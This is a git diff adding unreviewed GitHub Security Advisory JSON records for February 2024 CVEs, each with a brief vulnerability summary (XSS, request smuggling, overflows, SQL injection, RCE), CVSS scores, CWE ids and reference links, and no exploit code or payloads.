100644 index 0000000000000..6db344bfdbdd7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-283m-jhf4-68hp/GHSA-283m-jhf4-68hp.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-283m-jhf4-68hp", + "modified": "2024-02-01T12:30:23Z", + "published": "2024-02-01T12:30:23Z", + "aliases": [ + "CVE-2023-51694" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Epiphyt Embed Privacy allows Stored XSS.This issue affects Embed Privacy: from n/a through 1.8.0.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51694" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/embed-privacy/wordpress-embed-privacy-plugin-1-8-0-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2862-59r4-c989/GHSA-2862-59r4-c989.json b/advisories/unreviewed/2024/02/GHSA-2862-59r4-c989/GHSA-2862-59r4-c989.json new file mode 100644 index 0000000000000..7d46d189f10f6 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2862-59r4-c989/GHSA-2862-59r4-c989.json 
@@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2862-59r4-c989", + "modified": "2024-02-08T15:30:26Z", + "published": "2024-02-08T09:30:40Z", + "aliases": [ + "CVE-2024-23452" + ], + "details": "Request smuggling vulnerability in HTTP server in Apache bRPC 0.9.5~1.7.0 on all platforms allows attacker to smuggle request.\n\nVulnerability Cause Description:\n\nThe http_parser does not comply with the RFC-7230 HTTP 1.1 specification.\n\nAttack scenario:\nIf a message is received with both a Transfer-Encoding and a Content-Length header field, such a message might indicate an attempt to perform request smuggling or response splitting.\nOne particular attack scenario is that a bRPC made http server on the backend receiving requests in one persistent connection from frontend server that uses TE to parse request with the logic that 'chunk' is contained in the TE field. in that case an attacker can smuggle a request into the connection to the backend server. \n\nSolution:\nYou can choose one solution from below:\n1. Upgrade bRPC to version 1.8.0, which fixes this issue. Download link: https://github.com/apache/brpc/releases/tag/1.8.0\n 2. Apply this patch:  https://github.com/apache/brpc/pull/2518 \n\n", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23452" + }, + { + "type": "WEB", + "url": "https://github.com/apache/brpc/pull/2518" + }, + { + "type": "WEB", + "url": "https://github.com/apache/brpc/releases/tag/1.8.0" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/kkvdpwyr2s2yt9qvvxfdzon012898vxd" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/08/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-444" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T09:15:46Z" + } +} \ No newline at end of file 
diff --git a/advisories/unreviewed/2024/02/GHSA-292c-8vv7-pg3v/GHSA-292c-8vv7-pg3v.json b/advisories/unreviewed/2024/02/GHSA-292c-8vv7-pg3v/GHSA-292c-8vv7-pg3v.json new file mode 100644 index 0000000000000..59d8b59ac5d80 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-292c-8vv7-pg3v/GHSA-292c-8vv7-pg3v.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-292c-8vv7-pg3v", + "modified": "2024-02-06T06:30:31Z", + "published": "2024-02-06T06:30:31Z", + "aliases": [ + "CVE-2023-33067" + ], + "details": "Memory corruption in Audio while calling START command on host voice PCM multiple times for the same RX or TX tap points.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33067" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-293v-32vx-9g86/GHSA-293v-32vx-9g86.json b/advisories/unreviewed/2024/02/GHSA-293v-32vx-9g86/GHSA-293v-32vx-9g86.json new file mode 100644 index 0000000000000..6b93f92cda80f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-293v-32vx-9g86/GHSA-293v-32vx-9g86.json 
@@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-293v-32vx-9g86", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-22852" + ], + "details": "D-Link Go-RT-AC750 GORTAC750_A1_FW_v101b03 contains a stack-based buffer overflow via the function genacgi_main. This vulnerability allows attackers to enable telnet service via a specially crafted payload.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22852" + }, + { + "type": "WEB", + "url": "https://github.com/Beckaf/vunl/blob/main/D-Link/AC750/1/1.md" + }, + { + "type": "WEB", + "url": "https://www.dlink.com/en/security-bulletin/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T02:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2c82-fg6w-rjhp/GHSA-2c82-fg6w-rjhp.json b/advisories/unreviewed/2024/02/GHSA-2c82-fg6w-rjhp/GHSA-2c82-fg6w-rjhp.json new file mode 100644 index 0000000000000..a0cb2dd7072cd --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2c82-fg6w-rjhp/GHSA-2c82-fg6w-rjhp.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2c82-fg6w-rjhp", + "modified": "2024-02-06T21:30:26Z", + "published": "2024-02-06T21:30:26Z", + "aliases": [ + "CVE-2024-1256" + ], + "details": "A vulnerability was found in Jspxcms 10.2.0 and classified as problematic. This issue affects some unknown processing of the file /ext/collect/filter_text.do. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252995.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1256" + }, + { + "type": "WEB", + "url": "https://github.com/sweatxi/BugHub/blob/main/filter_txet_do.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252995" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252995" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T20:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2c8q-6p99-6rj3/GHSA-2c8q-6p99-6rj3.json b/advisories/unreviewed/2024/02/GHSA-2c8q-6p99-6rj3/GHSA-2c8q-6p99-6rj3.json new file mode 100644 index 0000000000000..2f03b20f08995 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2c8q-6p99-6rj3/GHSA-2c8q-6p99-6rj3.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2c8q-6p99-6rj3", + "modified": "2024-02-08T15:30:27Z", + "published": "2024-02-08T15:30:27Z", + "aliases": [ + "CVE-2024-24834" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in realmag777 BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net allows Stored XSS.This issue affects BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net: from n/a through 1.1.4.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24834" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/woo-bulk-editor/wordpress-bear-plugin-1-1-4-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T14:15:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2cmm-m4c8-c4wp/GHSA-2cmm-m4c8-c4wp.json b/advisories/unreviewed/2024/02/GHSA-2cmm-m4c8-c4wp/GHSA-2cmm-m4c8-c4wp.json new file mode 100644 index 0000000000000..875fffb885f0c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2cmm-m4c8-c4wp/GHSA-2cmm-m4c8-c4wp.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2cmm-m4c8-c4wp", + "modified": "2024-02-08T00:32:19Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2024-24263" + ], + "details": "Lotos WebServer v0.1.1 was discovered to contain a Use-After-Free (UAF) vulnerability via the response_append_status_line function at /lotos/src/response.c.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24263" + }, + { + "type": "WEB", + "url": "https://github.com/LuMingYinDetect/lotos_detects/blob/main/lotos_detect_1.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T18:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2cwc-8x85-2774/GHSA-2cwc-8x85-2774.json b/advisories/unreviewed/2024/02/GHSA-2cwc-8x85-2774/GHSA-2cwc-8x85-2774.json new file mode 100644 index 0000000000000..83b99fa91be59 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2cwc-8x85-2774/GHSA-2cwc-8x85-2774.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2cwc-8x85-2774", + "modified": "2024-02-02T21:31:29Z", + "published": "2024-02-02T21:31:29Z", + "aliases": [ + "CVE-2024-23553" + ], + "details": "A cross-site scripting (XSS) vulnerability in the Web Reports component of HCL BigFix Platform exists due to missing a specific http header attribute. \n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23553" + }, + { + "type": "WEB", + "url": "https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0110209" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2cwx-f949-qq48/GHSA-2cwx-f949-qq48.json b/advisories/unreviewed/2024/02/GHSA-2cwx-f949-qq48/GHSA-2cwx-f949-qq48.json new file mode 100644 index 0000000000000..d3a3198bcad34 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2cwx-f949-qq48/GHSA-2cwx-f949-qq48.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2cwx-f949-qq48", + "modified": "2024-02-08T12:30:48Z", + "published": "2024-02-08T12:30:48Z", + "aliases": [ + "CVE-2024-24879" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Yannick Lefebvre Link Library allows Reflected XSS.This issue affects Link Library: from n/a through 7.5.13.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24879" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/link-library/wordpress-link-library-plugin-7-5-13-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T12:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2gw8-8q9v-75m8/GHSA-2gw8-8q9v-75m8.json b/advisories/unreviewed/2024/02/GHSA-2gw8-8q9v-75m8/GHSA-2gw8-8q9v-75m8.json new file mode 100644 index 0000000000000..d781abf221a3a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2gw8-8q9v-75m8/GHSA-2gw8-8q9v-75m8.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2gw8-8q9v-75m8", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2023-6808" + ], + "details": "The Booking for Appointments and Events Calendar – Amelia plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.0.93 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6808" + }, + { + "type": "WEB", + "url": "https://plugins.svn.wordpress.org/ameliabooking/trunk/view/frontend/events.inc.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3015149/ameliabooking/trunk/view/frontend/events.inc.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/aafb5402-3553-4c89-86e0-4dd556d86074?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2j63-x9pq-h9wc/GHSA-2j63-x9pq-h9wc.json b/advisories/unreviewed/2024/02/GHSA-2j63-x9pq-h9wc/GHSA-2j63-x9pq-h9wc.json new file mode 100644 index 0000000000000..93edc8f0d7a13 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2j63-x9pq-h9wc/GHSA-2j63-x9pq-h9wc.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2j63-x9pq-h9wc", + "modified": "2024-02-07T00:30:26Z", + "published": "2024-02-07T00:30:26Z", + "aliases": [ + "CVE-2024-0971" + ], + "details": "\nA SQL injection vulnerability exists where an authenticated, low-privileged remote attacker could potentially alter scan DB content.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0971" + }, + { + "type": "WEB", + "url": "https://www.tenable.com/security/tns-2024-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T00:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2j7g-cpcm-93qx/GHSA-2j7g-cpcm-93qx.json b/advisories/unreviewed/2024/02/GHSA-2j7g-cpcm-93qx/GHSA-2j7g-cpcm-93qx.json new file mode 100644 index 0000000000000..60a9d3582ab1d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2j7g-cpcm-93qx/GHSA-2j7g-cpcm-93qx.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2j7g-cpcm-93qx", + "modified": "2024-02-06T12:30:31Z", + "published": "2024-02-06T12:30:31Z", + "aliases": [ + "CVE-2024-24942" + ], + "details": "In JetBrains TeamCity before 2023.11.3 path traversal allowed reading data within JAR archives", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24942" + }, + { + "type": "WEB", + "url": "https://www.jetbrains.com/privacy-security/issues-fixed/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-23" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T10:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2q4f-xv44-vmqf/GHSA-2q4f-xv44-vmqf.json b/advisories/unreviewed/2024/02/GHSA-2q4f-xv44-vmqf/GHSA-2q4f-xv44-vmqf.json new file mode 100644 index 0000000000000..4703f69c0604b --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2q4f-xv44-vmqf/GHSA-2q4f-xv44-vmqf.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2q4f-xv44-vmqf", + "modified": "2024-02-06T21:30:26Z", + "published": "2024-02-06T21:30:26Z", + "aliases": [ + "CVE-2024-22238" + ], + "details": "Aria Operations for Networks contains a cross site scripting vulnerability. A malicious actor with admin privileges may be able to inject malicious code into user profile configurations due to improper input sanitization. ", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22238" + }, + { + "type": "WEB", + "url": "https://www.vmware.com/security/advisories/VMSA-2024-0002.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T20:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2qm8-4j25-v4w6/GHSA-2qm8-4j25-v4w6.json b/advisories/unreviewed/2024/02/GHSA-2qm8-4j25-v4w6/GHSA-2qm8-4j25-v4w6.json new file mode 100644 index 0000000000000..b25a8918a0ee9 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2qm8-4j25-v4w6/GHSA-2qm8-4j25-v4w6.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2qm8-4j25-v4w6", + "modified": "2024-02-08T00:32:19Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2024-24265" + ], + "details": "gpac v2.2.1 was discovered to contain a memory leak via the dst_props variable in the gf_filter_pid_merge_properties_internal function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24265" + }, + { + "type": "WEB", + "url": "https://github.com/yinluming13579/gpac_defects/blob/main/gpac_1.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-401" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T18:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2qrq-mpmg-w3v6/GHSA-2qrq-mpmg-w3v6.json b/advisories/unreviewed/2024/02/GHSA-2qrq-mpmg-w3v6/GHSA-2qrq-mpmg-w3v6.json new file mode 100644 index 0000000000000..78967a2753df3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2qrq-mpmg-w3v6/GHSA-2qrq-mpmg-w3v6.json 
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2qrq-mpmg-w3v6", + "modified": "2024-02-08T21:30:38Z", + "published": "2024-02-08T21:30:38Z", + "aliases": [ + "CVE-2024-24494" + ], + "details": "Cross Site Scripting vulnerability in Daily Habit Tracker v.1.0 allows a remote attacker to execute arbitrary code via the day, exercise, pray, read_book, vitamins, laundry, alcohol and meat parameters in the add-tracker.php and update-tracker.php components.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24494" + }, + { + "type": "WEB", + "url": "https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/DailyHabitTracker-Stored_XSS.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2rrv-22x6-4f23/GHSA-2rrv-22x6-4f23.json b/advisories/unreviewed/2024/02/GHSA-2rrv-22x6-4f23/GHSA-2rrv-22x6-4f23.json new file mode 100644 index 0000000000000..cd9bbceeda620 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2rrv-22x6-4f23/GHSA-2rrv-22x6-4f23.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2rrv-22x6-4f23", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-02T00:31:28Z", + "aliases": [ + "CVE-2024-22016" + ], + "details": "In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, an authorized user can write directly to the Scada directory. This may allow privilege escalation.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22016" + }, + { + "type": "WEB", + "url": "https://rapidscada.org/contact/" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T00:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2rwq-3mr3-vq32/GHSA-2rwq-3mr3-vq32.json b/advisories/unreviewed/2024/02/GHSA-2rwq-3mr3-vq32/GHSA-2rwq-3mr3-vq32.json new file mode 100644 index 0000000000000..a23d6451af3bb --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2rwq-3mr3-vq32/GHSA-2rwq-3mr3-vq32.json 
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2rwq-3mr3-vq32", + "modified": "2024-02-05T06:30:31Z", + "published": "2024-02-05T06:30:31Z", + "aliases": [ + "CVE-2024-20009" + ], + "details": "In alac decoder, there is a possible out of bounds write due to an incorrect error handling. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS08441150; Issue ID: ALPS08441150.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20009" + }, + { + "type": "WEB", + "url": "https://corp.mediatek.com/product-security-bulletin/February-2024" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-2vc7-qfwp-f3cw/GHSA-2vc7-qfwp-f3cw.json b/advisories/unreviewed/2024/02/GHSA-2vc7-qfwp-f3cw/GHSA-2vc7-qfwp-f3cw.json new file mode 100644 index 0000000000000..b301df137e500 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-2vc7-qfwp-f3cw/GHSA-2vc7-qfwp-f3cw.json 
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2vc7-qfwp-f3cw",
+ "modified": "2024-02-06T06:30:32Z",
+ "published": "2024-02-06T06:30:32Z",
+ "aliases": [
+ "CVE-2023-43523"
+ ],
+ "details": "Transient DOS while processing 11AZ RTT management action frame received through OTA.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43523"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T06:16:02Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-2wff-jj2f-98c4/GHSA-2wff-jj2f-98c4.json b/advisories/unreviewed/2024/02/GHSA-2wff-jj2f-98c4/GHSA-2wff-jj2f-98c4.json
new file mode 100644
index 0000000000000..90bc2a14d41d5
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-2wff-jj2f-98c4/GHSA-2wff-jj2f-98c4.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2wff-jj2f-98c4",
+ "modified": "2024-02-05T21:30:31Z",
+ "published": "2024-02-05T21:30:31Z",
+ "aliases": [
+ "CVE-2024-0202"
+ ],
+ "details": "A security vulnerability has been identified in the cryptlib cryptographic library when cryptlib is compiled with the support for RSA key exchange ciphersuites in TLS (by setting the USE_RSA_SUITES define), it will be vulnerable to the timing variant of the Bleichenbacher attack. An attacker that is able to perform a large number of connections to the server will be able to decrypt RSA ciphertexts or forge signatures using server's certificate.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0202"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2256518"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-208"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T21:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-2wmp-6cvh-326h/GHSA-2wmp-6cvh-326h.json b/advisories/unreviewed/2024/02/GHSA-2wmp-6cvh-326h/GHSA-2wmp-6cvh-326h.json
new file mode 100644
index 0000000000000..96fdeb6097b9a
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-2wmp-6cvh-326h/GHSA-2wmp-6cvh-326h.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2wmp-6cvh-326h",
+ "modified": "2024-02-07T18:30:27Z",
+ "published": "2024-02-02T03:30:32Z",
+ "aliases": [
+ "CVE-2024-22899"
+ ],
+ "details": "Vinchin Backup & Recovery v7.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the syncNtpTime function.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22899"
+ },
+ {
+ "type": "WEB",
+ "url": "https://blog.leakix.net/2024/01/vinchin-backup-rce-chain/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://seclists.org/fulldisclosure/2024/Jan/29"
+ },
+ {
+ "type": "WEB",
+ "url": "http://vinchin.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T02:15:18Z"
+ }
+}
\ No newline at end of file
